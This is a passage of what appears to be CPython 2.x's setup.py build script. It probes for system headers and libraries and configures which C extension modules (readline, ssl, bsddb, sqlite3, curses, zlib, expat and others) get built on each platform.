399 | lib_dirs.append(item[2:])
400 |
401 | # Check for MacOS X, which doesn't need libm.a at all
402 | math_libs = ['m']
403 | if platform in ['darwin', 'beos', 'mac']:
404 | math_libs = []
405 |
406 | # XXX Omitted modules: gl, pure, dl, SGI-specific modules
407 |
408 | #
409 | # The following modules are all pretty straightforward, and compile
410 | # on pretty much any POSIXish platform.
411 | #
412 |
413 | # Some modules that are normally always on:
414 | exts.append( Extension('_weakref', ['_weakref.c']) )
415 |
416 | # array objects
417 | exts.append( Extension('array', ['arraymodule.c']) )
418 | # complex math library functions
419 | exts.append( Extension('cmath', ['cmathmodule.c'],
420 | libraries=math_libs) )
421 |
422 | # math library functions, e.g. sin()
423 | exts.append( Extension('math', ['mathmodule.c'],
424 | libraries=math_libs) )
425 | # fast string operations implemented in C
426 | exts.append( Extension('strop', ['stropmodule.c']) )
427 | # time operations and variables
428 | exts.append( Extension('time', ['timemodule.c'],
429 | libraries=math_libs) )
430 | exts.append( Extension('datetime', ['datetimemodule.c', 'timemodule.c'],
431 | libraries=math_libs) )
432 | # fast iterator tools implemented in C
433 | exts.append( Extension("itertools", ["itertoolsmodule.c"]) )
434 | # code that will be builtins in the future, but conflict with the
435 | # current builtins
436 | exts.append( Extension('future_builtins', ['future_builtins.c']) )
437 | # random number generator implemented in C
438 | exts.append( Extension("_random", ["_randommodule.c"]) )
439 | # high-performance collections
440 | exts.append( Extension("_collections", ["_collectionsmodule.c"]) )
441 | # bisect
442 | exts.append( Extension("_bisect", ["_bisectmodule.c"]) )
443 | # heapq
444 | exts.append( Extension("_heapq", ["_heapqmodule.c"]) )
445 | # operator.add() and similar goodies
446 | exts.append( Extension('operator', ['operator.c']) )
447 | # Python 3.0 _fileio module
448 | exts.append( Extension("_fileio", ["_fileio.c"]) )
449 | # Python 3.0 _bytesio module
450 | exts.append( Extension("_bytesio", ["_bytesio.c"]) )
451 | # _functools
452 | exts.append( Extension("_functools", ["_functoolsmodule.c"]) )
453 | # _json speedups
454 | exts.append( Extension("_json", ["_json.c"]) )
455 | # Python C API test module
456 | exts.append( Extension('_testcapi', ['_testcapimodule.c'],
457 | depends=['testcapi_long.h']) )
458 | # profilers (_lsprof is for cProfile.py)
459 | exts.append( Extension('_hotshot', ['_hotshot.c']) )
460 | exts.append( Extension('_lsprof', ['_lsprof.c', 'rotatingtree.c']) )
461 | # static Unicode character database
462 | if have_unicode:
463 | exts.append( Extension('unicodedata', ['unicodedata.c']) )
464 | else:
465 | missing.append('unicodedata')
466 | # access to ISO C locale support
467 | data = open('pyconfig.h').read()
468 | m = re.search(r"#s*define\s+WITH_LIBINTL\s+1\s*", data)
469 | if m is not None:
470 | locale_libs = ['intl']
471 | else:
472 | locale_libs = []
473 | if platform == 'darwin':
474 | locale_extra_link_args = ['-framework', 'CoreFoundation']
475 | else:
476 | locale_extra_link_args = []
477 |
478 |
479 | exts.append( Extension('_locale', ['_localemodule.c'],
480 | libraries=locale_libs,
481 | extra_link_args=locale_extra_link_args) )
482 |
483 | # Modules with some UNIX dependencies -- on by default:
484 | # (If you have a really backward UNIX, select and socket may not be
485 | # supported...)
486 |
487 | # fcntl(2) and ioctl(2)
488 | exts.append( Extension('fcntl', ['fcntlmodule.c']) )
489 | if platform not in ['mac']:
490 | # pwd(3)
491 | exts.append( Extension('pwd', ['pwdmodule.c']) )
492 | # grp(3)
493 | exts.append( Extension('grp', ['grpmodule.c']) )
494 | # spwd, shadow passwords
495 | if (config_h_vars.get('HAVE_GETSPNAM', False) or
496 | config_h_vars.get('HAVE_GETSPENT', False)):
497 | exts.append( Extension('spwd', ['spwdmodule.c']) )
498 | else:
499 | missing.append('spwd')
500 | else:
501 | missing.extend(['pwd', 'grp', 'spwd'])
502 |
503 | # select(2); not on ancient System V
504 | exts.append( Extension('select', ['selectmodule.c']) )
505 |
506 | # Fred Drake's interface to the Python parser
507 | exts.append( Extension('parser', ['parsermodule.c']) )
508 |
509 | # cStringIO and cPickle
510 | exts.append( Extension('cStringIO', ['cStringIO.c']) )
511 | exts.append( Extension('cPickle', ['cPickle.c']) )
512 |
513 | # Memory-mapped files (also works on Win32).
514 | if platform not in ['atheos', 'mac']:
515 | exts.append( Extension('mmap', ['mmapmodule.c']) )
516 | else:
517 | missing.append('mmap')
518 |
519 | # Lance Ellinghaus's syslog module
520 | if platform not in ['mac']:
521 | # syslog daemon interface
522 | exts.append( Extension('syslog', ['syslogmodule.c']) )
523 | else:
524 | missing.append('syslog')
525 |
526 | # George Neville-Neil's timing module:
527 | # Deprecated in PEP 4 http://www.python.org/peps/pep-0004.html
528 | # http://mail.python.org/pipermail/python-dev/2006-January/060023.html
529 | #exts.append( Extension('timing', ['timingmodule.c']) )
530 |
531 | #
532 | # Here ends the simple stuff. From here on, modules need certain
533 | # libraries, are platform-specific, or present other surprises.
534 | #
535 |
536 | # Multimedia modules
537 | # These don't work for 64-bit platforms!!!
538 | # These represent audio samples or images as strings:
539 |
540 | # Operations on audio samples
541 | # According to #993173, this one should actually work fine on
542 | # 64-bit platforms.
543 | exts.append( Extension('audioop', ['audioop.c']) )
544 |
545 | # Disabled on 64-bit platforms
546 | if sys.maxint != 9223372036854775807L:
547 | # Operations on images
548 | exts.append( Extension('imageop', ['imageop.c']) )
549 | else:
550 | missing.extend(['imageop'])
551 |
552 | # readline
553 | do_readline = self.compiler.find_library_file(lib_dirs, 'readline')
554 | if platform == 'darwin': # and os.uname()[2] < '9.':
555 | # MacOSX 10.4 has a broken readline. Don't try to build
556 | # the readline module unless the user has installed a fixed
557 | # readline package
558 | # FIXME: The readline emulation on 10.5 is better, but the
559 | # readline module doesn't compile out of the box.
560 | if find_file('readline/rlconf.h', inc_dirs, []) is None:
561 | do_readline = False
562 | if do_readline:
563 | if sys.platform == 'darwin':
564 | # In every directory on the search path search for a dynamic
565 | # library and then a static library, instead of first looking
566 |                 # for dynamic libraries on the entire path.
567 |                 # This way a statically linked custom readline gets picked up
568 | # before the (broken) dynamic library in /usr/lib.
569 | readline_extra_link_args = ('-Wl,-search_paths_first',)
570 | else:
571 | readline_extra_link_args = ()
572 |
573 | readline_libs = ['readline']
574 | if self.compiler.find_library_file(lib_dirs,
575 | 'ncursesw'):
576 | readline_libs.append('ncursesw')
577 | elif self.compiler.find_library_file(lib_dirs,
578 | 'ncurses'):
579 | readline_libs.append('ncurses')
580 | elif self.compiler.find_library_file(lib_dirs, 'curses'):
581 | readline_libs.append('curses')
582 | elif self.compiler.find_library_file(lib_dirs +
583 | ['/usr/lib/termcap'],
584 | 'termcap'):
585 | readline_libs.append('termcap')
586 | exts.append( Extension('readline', ['readline.c'],
587 | library_dirs=['/usr/lib/termcap'],
588 | extra_link_args=readline_extra_link_args,
589 | libraries=readline_libs) )
590 | else:
591 | missing.append('readline')
592 |
593 | if platform not in ['mac']:
594 | # crypt module.
595 |
596 | if self.compiler.find_library_file(lib_dirs, 'crypt'):
597 | libs = ['crypt']
598 | else:
599 | libs = []
600 | exts.append( Extension('crypt', ['cryptmodule.c'], libraries=libs) )
601 | else:
602 | missing.append('crypt')
603 |
604 | # CSV files
605 | exts.append( Extension('_csv', ['_csv.c']) )
606 |
607 | # socket(2)
608 | exts.append( Extension('_socket', ['socketmodule.c'],
609 | depends = ['socketmodule.h']) )
610 | # Detect SSL support for the socket module (via _ssl)
611 | search_for_ssl_incs_in = [
612 | '/usr/local/ssl/include',
613 | '/usr/contrib/ssl/include/'
614 | ]
615 | ssl_incs = find_file('openssl/ssl.h', inc_dirs,
616 | search_for_ssl_incs_in
617 | )
618 | if ssl_incs is not None:
619 | krb5_h = find_file('krb5.h', inc_dirs,
620 | ['/usr/kerberos/include'])
621 | if krb5_h:
622 | ssl_incs += krb5_h
623 | ssl_libs = find_library_file(self.compiler, 'ssl',lib_dirs,
624 | ['/usr/local/ssl/lib',
625 | '/usr/contrib/ssl/lib/'
626 | ] )
627 |
628 | if (ssl_incs is not None and
629 | ssl_libs is not None):
630 | exts.append( Extension('_ssl', ['_ssl.c'],
631 | include_dirs = ssl_incs,
632 | library_dirs = ssl_libs,
633 | libraries = ['ssl', 'crypto'],
634 | depends = ['socketmodule.h']), )
635 | else:
636 | missing.append('_ssl')
637 |
638 | # find out which version of OpenSSL we have
639 | openssl_ver = 0
640 | openssl_ver_re = re.compile(
641 | '^\s*#\s*define\s+OPENSSL_VERSION_NUMBER\s+(0x[0-9a-fA-F]+)' )
642 | for ssl_inc_dir in inc_dirs + search_for_ssl_incs_in:
643 | name = os.path.join(ssl_inc_dir, 'openssl', 'opensslv.h')
644 | if os.path.isfile(name):
645 | try:
646 | incfile = open(name, 'r')
647 | for line in incfile:
648 | m = openssl_ver_re.match(line)
649 | if m:
650 | openssl_ver = eval(m.group(1))
651 | break
652 | except IOError:
653 | pass
654 |
655 | # first version found is what we'll use (as the compiler should)
656 | if openssl_ver:
657 | break
658 |
659 | #print 'openssl_ver = 0x%08x' % openssl_ver
660 |
661 | if (ssl_incs is not None and
662 | ssl_libs is not None and
663 | openssl_ver >= 0x00907000):
664 | # The _hashlib module wraps optimized implementations
665 | # of hash functions from the OpenSSL library.
666 | exts.append( Extension('_hashlib', ['_hashopenssl.c'],
667 | include_dirs = ssl_incs,
668 | library_dirs = ssl_libs,
669 | libraries = ['ssl', 'crypto']) )
670 | # these aren't strictly missing since they are unneeded.
671 | #missing.extend(['_sha', '_md5'])
672 | else:
673 | # The _sha module implements the SHA1 hash algorithm.
674 | exts.append( Extension('_sha', ['shamodule.c']) )
675 | # The _md5 module implements the RSA Data Security, Inc. MD5
676 | # Message-Digest Algorithm, described in RFC 1321. The
677 | # necessary files md5.c and md5.h are included here.
678 | exts.append( Extension('_md5',
679 | sources = ['md5module.c', 'md5.c'],
680 | depends = ['md5.h']) )
681 | missing.append('_hashlib')
682 |
683 | if (openssl_ver < 0x00908000):
684 | # OpenSSL doesn't do these until 0.9.8 so we'll bring our own hash
685 | exts.append( Extension('_sha256', ['sha256module.c']) )
686 | exts.append( Extension('_sha512', ['sha512module.c']) )
687 |
688 | # Modules that provide persistent dictionary-like semantics. You will
689 | # probably want to arrange for at least one of them to be available on
690 | # your machine, though none are defined by default because of library
691 | # dependencies. The Python module anydbm.py provides an
692 | # implementation independent wrapper for these; dumbdbm.py provides
693 | # similar functionality (but slower of course) implemented in Python.
694 |
695 | # Sleepycat^WOracle Berkeley DB interface.
696 | # http://www.oracle.com/database/berkeley-db/db/index.html
697 | #
698 | # This requires the Sleepycat^WOracle DB code. The supported versions
699 | # are set below. Visit the URL above to download
700 | # a release. Most open source OSes come with one or more
701 | # versions of BerkeleyDB already installed.
702 |
703 | max_db_ver = (4, 7)
704 | min_db_ver = (3, 3)
705 | db_setup_debug = False # verbose debug prints from this script?
706 |
707 | def allow_db_ver(db_ver):
708 | """Returns a boolean if the given BerkeleyDB version is acceptable.
709 |
710 | Args:
711 | db_ver: A tuple of the version to verify.
712 | """
713 | if not (min_db_ver <= db_ver <= max_db_ver):
714 | return False
715 | # Use this function to filter out known bad configurations.
716 | if (4, 6) == db_ver[:2]:
717 | # BerkeleyDB 4.6.x is not stable on many architectures.
718 | arch = platform_machine()
719 | if arch not in ('i386', 'i486', 'i586', 'i686',
720 | 'x86_64', 'ia64'):
721 | return False
722 | return True
723 |
724 | def gen_db_minor_ver_nums(major):
725 | if major == 4:
726 | for x in range(max_db_ver[1]+1):
727 | if allow_db_ver((4, x)):
728 | yield x
729 | elif major == 3:
730 | for x in (3,):
731 | if allow_db_ver((3, x)):
732 | yield x
733 | else:
734 | raise ValueError("unknown major BerkeleyDB version", major)
735 |
736 | # construct a list of paths to look for the header file in on
737 | # top of the normal inc_dirs.
738 | db_inc_paths = [
739 | '/usr/include/db4',
740 | '/usr/local/include/db4',
741 | '/opt/sfw/include/db4',
742 | '/usr/include/db3',
743 | '/usr/local/include/db3',
744 | '/opt/sfw/include/db3',
745 | # Fink defaults (http://fink.sourceforge.net/)
746 | '/sw/include/db4',
747 | '/sw/include/db3',
748 | ]
749 | # 4.x minor number specific paths
750 | for x in gen_db_minor_ver_nums(4):
751 | db_inc_paths.append('/usr/include/db4%d' % x)
752 | db_inc_paths.append('/usr/include/db4.%d' % x)
753 | db_inc_paths.append('/usr/local/BerkeleyDB.4.%d/include' % x)
754 | db_inc_paths.append('/usr/local/include/db4%d' % x)
755 | db_inc_paths.append('/pkg/db-4.%d/include' % x)
756 | db_inc_paths.append('/opt/db-4.%d/include' % x)
757 | # MacPorts default (http://www.macports.org/)
758 | db_inc_paths.append('/opt/local/include/db4%d' % x)
759 | # 3.x minor number specific paths
760 | for x in gen_db_minor_ver_nums(3):
761 | db_inc_paths.append('/usr/include/db3%d' % x)
762 | db_inc_paths.append('/usr/local/BerkeleyDB.3.%d/include' % x)
763 | db_inc_paths.append('/usr/local/include/db3%d' % x)
764 | db_inc_paths.append('/pkg/db-3.%d/include' % x)
765 | db_inc_paths.append('/opt/db-3.%d/include' % x)
766 |
767 | # Add some common subdirectories for Sleepycat DB to the list,
768 | # based on the standard include directories. This way DB3/4 gets
769 | # picked up when it is installed in a non-standard prefix and
770 | # the user has added that prefix into inc_dirs.
771 | std_variants = []
772 | for dn in inc_dirs:
773 | std_variants.append(os.path.join(dn, 'db3'))
774 | std_variants.append(os.path.join(dn, 'db4'))
775 | for x in gen_db_minor_ver_nums(4):
776 | std_variants.append(os.path.join(dn, "db4%d"%x))
777 | std_variants.append(os.path.join(dn, "db4.%d"%x))
778 | for x in gen_db_minor_ver_nums(3):
779 | std_variants.append(os.path.join(dn, "db3%d"%x))
780 | std_variants.append(os.path.join(dn, "db3.%d"%x))
781 |
782 | db_inc_paths = std_variants + db_inc_paths
783 | db_inc_paths = [p for p in db_inc_paths if os.path.exists(p)]
784 |
785 | db_ver_inc_map = {}
786 |
787 | class db_found(Exception): pass
788 | try:
789 | # See whether there is a Sleepycat header in the standard
790 | # search path.
791 | for d in inc_dirs + db_inc_paths:
792 | f = os.path.join(d, "db.h")
793 | if db_setup_debug: print "db: looking for db.h in", f
794 | if os.path.exists(f):
795 | f = open(f).read()
796 | m = re.search(r"#define\WDB_VERSION_MAJOR\W(\d+)", f)
797 | if m:
798 | db_major = int(m.group(1))
799 | m = re.search(r"#define\WDB_VERSION_MINOR\W(\d+)", f)
800 | db_minor = int(m.group(1))
801 | db_ver = (db_major, db_minor)
802 |
803 | # Avoid 4.6 prior to 4.6.21 due to a BerkeleyDB bug
804 | if db_ver == (4, 6):
805 | m = re.search(r"#define\WDB_VERSION_PATCH\W(\d+)", f)
806 | db_patch = int(m.group(1))
807 | if db_patch < 21:
808 | print "db.h:", db_ver, "patch", db_patch,
809 | print "being ignored (4.6.x must be >= 4.6.21)"
810 | continue
811 |
812 | if ( (not db_ver_inc_map.has_key(db_ver)) and
813 | allow_db_ver(db_ver) ):
814 | # save the include directory with the db.h version
815 | # (first occurrence only)
816 | db_ver_inc_map[db_ver] = d
817 | if db_setup_debug:
818 | print "db.h: found", db_ver, "in", d
819 | else:
820 | # we already found a header for this library version
821 | if db_setup_debug: print "db.h: ignoring", d
822 | else:
823 | # ignore this header, it didn't contain a version number
824 | if db_setup_debug:
825 |                             print "db.h: no version number in", d
826 |
827 | db_found_vers = db_ver_inc_map.keys()
828 | db_found_vers.sort()
829 |
830 | while db_found_vers:
831 | db_ver = db_found_vers.pop()
832 | db_incdir = db_ver_inc_map[db_ver]
833 |
834 | # check lib directories parallel to the location of the header
835 | db_dirs_to_check = [
836 | db_incdir.replace("include", 'lib64'),
837 | db_incdir.replace("include", 'lib'),
838 | ]
839 | db_dirs_to_check = filter(os.path.isdir, db_dirs_to_check)
840 |
841 |                 # Look for a version specific db-X.Y before an ambiguous dbX
842 | # XXX should we -ever- look for a dbX name? Do any
843 | # systems really not name their library by version and
844 | # symlink to more general names?
845 | for dblib in (('db-%d.%d' % db_ver),
846 | ('db%d%d' % db_ver),
847 | ('db%d' % db_ver[0])):
848 | dblib_file = self.compiler.find_library_file(
849 | db_dirs_to_check + lib_dirs, dblib )
850 | if dblib_file:
851 | dblib_dir = [ os.path.abspath(os.path.dirname(dblib_file)) ]
852 | raise db_found
853 | else:
854 | if db_setup_debug: print "db lib: ", dblib, "not found"
855 |
856 | except db_found:
857 | if db_setup_debug:
858 | print "bsddb using BerkeleyDB lib:", db_ver, dblib
859 | print "bsddb lib dir:", dblib_dir, " inc dir:", db_incdir
860 | db_incs = [db_incdir]
861 | dblibs = [dblib]
862 | # We add the runtime_library_dirs argument because the
863 | # BerkeleyDB lib we're linking against often isn't in the
864 | # system dynamic library search path. This is usually
865 | # correct and most trouble free, but may cause problems in
866 | # some unusual system configurations (e.g. the directory
867 | # is on an NFS server that goes away).
868 | exts.append(Extension('_bsddb', ['_bsddb.c'],
869 | depends = ['bsddb.h'],
870 | library_dirs=dblib_dir,
871 | runtime_library_dirs=dblib_dir,
872 | include_dirs=db_incs,
873 | libraries=dblibs))
874 | else:
875 | if db_setup_debug: print "db: no appropriate library found"
876 | db_incs = None
877 | dblibs = []
878 | dblib_dir = None
879 | missing.append('_bsddb')
880 |
881 | # The sqlite interface
882 | sqlite_setup_debug = False # verbose debug prints from this script?
883 |
884 | # We hunt for #define SQLITE_VERSION "n.n.n"
885 | # We need to find >= sqlite version 3.0.8
886 | sqlite_incdir = sqlite_libdir = None
887 | sqlite_inc_paths = [ '/usr/include',
888 | '/usr/include/sqlite',
889 | '/usr/include/sqlite3',
890 | '/usr/local/include',
891 | '/usr/local/include/sqlite',
892 | '/usr/local/include/sqlite3',
893 | ]
894 | MIN_SQLITE_VERSION_NUMBER = (3, 0, 8)
895 | MIN_SQLITE_VERSION = ".".join([str(x)
896 | for x in MIN_SQLITE_VERSION_NUMBER])
897 |
898 | # Scan the default include directories before the SQLite specific
899 | # ones. This allows one to override the copy of sqlite on OSX,
900 | # where /usr/include contains an old version of sqlite.
901 | for d in inc_dirs + sqlite_inc_paths:
902 | f = os.path.join(d, "sqlite3.h")
903 | if os.path.exists(f):
904 | if sqlite_setup_debug: print "sqlite: found %s"%f
905 | incf = open(f).read()
906 | m = re.search(
907 | r'\s*.*#\s*.*define\s.*SQLITE_VERSION\W*"(.*)"', incf)
908 | if m:
909 | sqlite_version = m.group(1)
910 | sqlite_version_tuple = tuple([int(x)
911 | for x in sqlite_version.split(".")])
912 | if sqlite_version_tuple >= MIN_SQLITE_VERSION_NUMBER:
913 | # we win!
914 | if sqlite_setup_debug:
915 | print "%s/sqlite3.h: version %s"%(d, sqlite_version)
916 | sqlite_incdir = d
917 | break
918 | else:
919 | if sqlite_setup_debug:
920 |                             print "%s: version %s is too old, need >= %s"%(d,
921 | sqlite_version, MIN_SQLITE_VERSION)
922 | elif sqlite_setup_debug:
923 | print "sqlite: %s had no SQLITE_VERSION"%(f,)
924 |
925 | if sqlite_incdir:
926 | sqlite_dirs_to_check = [
927 | os.path.join(sqlite_incdir, '..', 'lib64'),
928 | os.path.join(sqlite_incdir, '..', 'lib'),
929 | os.path.join(sqlite_incdir, '..', '..', 'lib64'),
930 | os.path.join(sqlite_incdir, '..', '..', 'lib'),
931 | ]
932 | sqlite_libfile = self.compiler.find_library_file(
933 | sqlite_dirs_to_check + lib_dirs, 'sqlite3')
934 | if sqlite_libfile:
935 | sqlite_libdir = [os.path.abspath(os.path.dirname(sqlite_libfile))]
936 |
937 | if sqlite_incdir and sqlite_libdir:
938 | sqlite_srcs = ['_sqlite/cache.c',
939 | '_sqlite/connection.c',
940 | '_sqlite/cursor.c',
941 | '_sqlite/microprotocols.c',
942 | '_sqlite/module.c',
943 | '_sqlite/prepare_protocol.c',
944 | '_sqlite/row.c',
945 | '_sqlite/statement.c',
946 | '_sqlite/util.c', ]
947 |
948 | sqlite_defines = []
949 | if sys.platform != "win32":
950 | sqlite_defines.append(('MODULE_NAME', '"sqlite3"'))
951 | else:
952 | sqlite_defines.append(('MODULE_NAME', '\\"sqlite3\\"'))
953 |
954 |
955 | if sys.platform == 'darwin':
956 | # In every directory on the search path search for a dynamic
957 | # library and then a static library, instead of first looking
958 |                 # for dynamic libraries on the entire path.
959 |                 # This way a statically linked custom sqlite gets picked up
960 | # before the dynamic library in /usr/lib.
961 | sqlite_extra_link_args = ('-Wl,-search_paths_first',)
962 | else:
963 | sqlite_extra_link_args = ()
964 |
965 | exts.append(Extension('_sqlite3', sqlite_srcs,
966 | define_macros=sqlite_defines,
967 | include_dirs=["Modules/_sqlite",
968 | sqlite_incdir],
969 | library_dirs=sqlite_libdir,
970 | runtime_library_dirs=sqlite_libdir,
971 | extra_link_args=sqlite_extra_link_args,
972 | libraries=["sqlite3",]))
973 | else:
974 | missing.append('_sqlite3')
975 |
976 | # Look for Berkeley db 1.85. Note that it is built as a different
977 | # module name so it can be included even when later versions are
978 | # available. A very restrictive search is performed to avoid
979 | # accidentally building this module with a later version of the
980 |         # underlying db library. Many BSD-ish Unixes incorporate db 1.85
981 | # symbols into libc and place the include file in /usr/include.
982 | #
983 | # If the better bsddb library can be built (db_incs is defined)
984 | # we do not build this one. Otherwise this build will pick up
985 | # the more recent berkeleydb's db.h file first in the include path
986 | # when attempting to compile and it will fail.
987 | f = "/usr/include/db.h"
988 | if os.path.exists(f) and not db_incs:
989 | data = open(f).read()
990 | m = re.search(r"#s*define\s+HASHVERSION\s+2\s*", data)
991 | if m is not None:
992 | # bingo - old version used hash file format version 2
993 | ### XXX this should be fixed to not be platform-dependent
994 | ### but I don't have direct access to an osf1 platform and
995 | ### seemed to be muffing the search somehow
996 | libraries = platform == "osf1" and ['db'] or None
997 | if libraries is not None:
998 | exts.append(Extension('bsddb185', ['bsddbmodule.c'],
999 | libraries=libraries))
1000 | else:
1001 | exts.append(Extension('bsddb185', ['bsddbmodule.c']))
1002 | else:
1003 | missing.append('bsddb185')
1004 | else:
1005 | missing.append('bsddb185')
1006 |
1007 | # The standard Unix dbm module:
1008 | if platform not in ['cygwin']:
1009 | if find_file("ndbm.h", inc_dirs, []) is not None:
1010 | # Some systems have -lndbm, others don't
1011 | if self.compiler.find_library_file(lib_dirs, 'ndbm'):
1012 | ndbm_libs = ['ndbm']
1013 | else:
1014 | ndbm_libs = []
1015 | exts.append( Extension('dbm', ['dbmmodule.c'],
1016 | define_macros=[('HAVE_NDBM_H',None)],
1017 | libraries = ndbm_libs ) )
1018 | elif self.compiler.find_library_file(lib_dirs, 'gdbm'):
1019 | gdbm_libs = ['gdbm']
1020 | if self.compiler.find_library_file(lib_dirs, 'gdbm_compat'):
1021 | gdbm_libs.append('gdbm_compat')
1022 | if find_file("gdbm/ndbm.h", inc_dirs, []) is not None:
1023 | exts.append( Extension(
1024 | 'dbm', ['dbmmodule.c'],
1025 | define_macros=[('HAVE_GDBM_NDBM_H',None)],
1026 | libraries = gdbm_libs ) )
1027 | elif find_file("gdbm-ndbm.h", inc_dirs, []) is not None:
1028 | exts.append( Extension(
1029 | 'dbm', ['dbmmodule.c'],
1030 | define_macros=[('HAVE_GDBM_DASH_NDBM_H',None)],
1031 | libraries = gdbm_libs ) )
1032 | else:
1033 | missing.append('dbm')
1034 | elif db_incs is not None:
1035 | exts.append( Extension('dbm', ['dbmmodule.c'],
1036 | library_dirs=dblib_dir,
1037 | runtime_library_dirs=dblib_dir,
1038 | include_dirs=db_incs,
1039 | define_macros=[('HAVE_BERKDB_H',None),
1040 | ('DB_DBM_HSEARCH',None)],
1041 | libraries=dblibs))
1042 | else:
1043 | missing.append('dbm')
1044 |
1045 | # Anthony Baxter's gdbm module. GNU dbm(3) will require -lgdbm:
1046 | if (self.compiler.find_library_file(lib_dirs, 'gdbm')):
1047 | exts.append( Extension('gdbm', ['gdbmmodule.c'],
1048 | libraries = ['gdbm'] ) )
1049 | else:
1050 | missing.append('gdbm')
1051 |
1052 | # Unix-only modules
1053 | if platform not in ['mac', 'win32']:
1054 | # Steen Lumholt's termios module
1055 | exts.append( Extension('termios', ['termios.c']) )
1056 | # Jeremy Hylton's rlimit interface
1057 | if platform not in ['atheos']:
1058 | exts.append( Extension('resource', ['resource.c']) )
1059 | else:
1060 | missing.append('resource')
1061 |
1062 | # Sun yellow pages. Some systems have the functions in libc.
1063 | if platform not in ['cygwin', 'atheos', 'qnx6']:
1064 | if (self.compiler.find_library_file(lib_dirs, 'nsl')):
1065 | libs = ['nsl']
1066 | else:
1067 | libs = []
1068 | exts.append( Extension('nis', ['nismodule.c'],
1069 | libraries = libs) )
1070 | else:
1071 | missing.append('nis')
1072 | else:
1073 | missing.extend(['nis', 'resource', 'termios'])
1074 |
1075 | # Curses support, requiring the System V version of curses, often
1076 | # provided by the ncurses library.
1077 | panel_library = 'panel'
1078 | if (self.compiler.find_library_file(lib_dirs, 'ncursesw')):
1079 | curses_libs = ['ncursesw']
1080 | # Bug 1464056: If _curses.so links with ncursesw,
1081 | # _curses_panel.so must link with panelw.
1082 | panel_library = 'panelw'
1083 | exts.append( Extension('_curses', ['_cursesmodule.c'],
1084 | libraries = curses_libs) )
1085 | elif (self.compiler.find_library_file(lib_dirs, 'ncurses')):
1086 | curses_libs = ['ncurses']
1087 | exts.append( Extension('_curses', ['_cursesmodule.c'],
1088 | libraries = curses_libs) )
1089 | elif (self.compiler.find_library_file(lib_dirs, 'curses')
1090 | and platform != 'darwin'):
1091 | # OSX has an old Berkeley curses, not good enough for
1092 | # the _curses module.
1093 | if (self.compiler.find_library_file(lib_dirs, 'terminfo')):
1094 | curses_libs = ['curses', 'terminfo']
1095 | elif (self.compiler.find_library_file(lib_dirs, 'termcap')):
1096 | curses_libs = ['curses', 'termcap']
1097 | else:
1098 | curses_libs = ['curses']
1099 |
1100 | exts.append( Extension('_curses', ['_cursesmodule.c'],
1101 | libraries = curses_libs) )
1102 | else:
1103 | missing.append('_curses')
1104 |
1105 | # If the curses module is enabled, check for the panel module
1106 | if (module_enabled(exts, '_curses') and
1107 | self.compiler.find_library_file(lib_dirs, panel_library)):
1108 | exts.append( Extension('_curses_panel', ['_curses_panel.c'],
1109 | libraries = [panel_library] + curses_libs) )
1110 | else:
1111 | missing.append('_curses_panel')
1112 |
1113 | # Andrew Kuchling's zlib module. Note that some versions of zlib
1114 | # 1.1.3 have security problems. See CERT Advisory CA-2002-07:
1115 | # http://www.cert.org/advisories/CA-2002-07.html
1116 | #
1117 | # zlib 1.1.4 is fixed, but at least one vendor (RedHat) has decided to
1118 | # patch its zlib 1.1.3 package instead of upgrading to 1.1.4. For
1119 | # now, we still accept 1.1.3, because we think it's difficult to
1120 | # exploit this in Python, and we'd rather make it RedHat's problem
1121 | # than our problem.
1122 | #
1123 | # You can upgrade zlib to version 1.1.4 yourself by going to
1124 | # http://www.gzip.org/zlib/
1125 | zlib_inc = find_file('zlib.h', [], inc_dirs)
1126 | have_zlib = False
1127 | if zlib_inc is not None:
1128 | zlib_h = zlib_inc[0] + '/zlib.h'
1129 | version = '"0.0.0"'
1130 | version_req = '"1.1.3"'
1131 | fp = open(zlib_h)
1132 | while 1:
1133 | line = fp.readline()
1134 | if not line:
1135 | break
1136 | if line.startswith('#define ZLIB_VERSION'):
1137 | version = line.split()[2]
1138 | break
1139 | if version >= version_req:
1140 | if (self.compiler.find_library_file(lib_dirs, 'z')):
1141 | if sys.platform == "darwin":
1142 | zlib_extra_link_args = ('-Wl,-search_paths_first',)
1143 | else:
1144 | zlib_extra_link_args = ()
1145 | exts.append( Extension('zlib', ['zlibmodule.c'],
1146 | libraries = ['z'],
1147 | extra_link_args = zlib_extra_link_args))
1148 | have_zlib = True
1149 | else:
1150 | missing.append('zlib')
1151 | else:
1152 | missing.append('zlib')
1153 | else:
1154 | missing.append('zlib')
1155 |
1156 | # Helper module for various ASCII encoders. Uses zlib for an optimized
1157 | # crc32 if we have it. Otherwise binascii uses its own.
1158 | if have_zlib:
1159 | extra_compile_args = ['-DUSE_ZLIB_CRC32']
1160 | libraries = ['z']
1161 | extra_link_args = zlib_extra_link_args
1162 | else:
1163 | extra_compile_args = []
1164 | libraries = []
1165 | extra_link_args = []
1166 | exts.append( Extension('binascii', ['binascii.c'],
1167 | extra_compile_args = extra_compile_args,
1168 | libraries = libraries,
1169 | extra_link_args = extra_link_args) )
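     | # Either way binascii.crc32 and zlib.crc32 return identical CRC-32 values;
     | # USE_ZLIB_CRC32 only selects zlib's optimized implementation. An
     | # illustrative check:
     | #     python -c "import binascii, zlib; print binascii.crc32('spam') == zlib.crc32('spam')"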
1170 |
1171 | # Gustavo Niemeyer's bz2 module.
1172 | if (self.compiler.find_library_file(lib_dirs, 'bz2')):
1173 | if sys.platform == "darwin":
1174 | bz2_extra_link_args = ('-Wl,-search_paths_first',)
1175 | else:
1176 | bz2_extra_link_args = ()
1177 | exts.append( Extension('bz2', ['bz2module.c'],
1178 | libraries = ['bz2'],
1179 | extra_link_args = bz2_extra_link_args) )
1180 | else:
1181 | missing.append('bz2')
1182 |
1183 | # Interface to the Expat XML parser
1184 | #
1185 | # Expat was written by James Clark and is now maintained by a
1186 | # group of developers on SourceForge; see www.libexpat.org for
1187 | # more information. The pyexpat module was written by Paul
1188 | # Prescod after a prototype by Jack Jansen. The Expat source
1189 | # is included in Modules/expat/. Usage of a system
1190 | # shared libexpat.so/expat.dll is not advised.
1191 | #
1192 | # More information on Expat can be found at www.libexpat.org.
1193 | #
1194 | expatinc = os.path.join(os.getcwd(), srcdir, 'Modules', 'expat')
1195 | define_macros = [
1196 | ('HAVE_EXPAT_CONFIG_H', '1'),
1197 | ]
1198 |
1199 | exts.append(Extension('pyexpat',
1200 | define_macros = define_macros,
1201 | include_dirs = [expatinc],
1202 | sources = ['pyexpat.c',
1203 | 'expat/xmlparse.c',
1204 | 'expat/xmlrole.c',
1205 | 'expat/xmltok.c',
1206 | ],
1207 | ))
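     | # The bundled Expat sources listed above are compiled directly into
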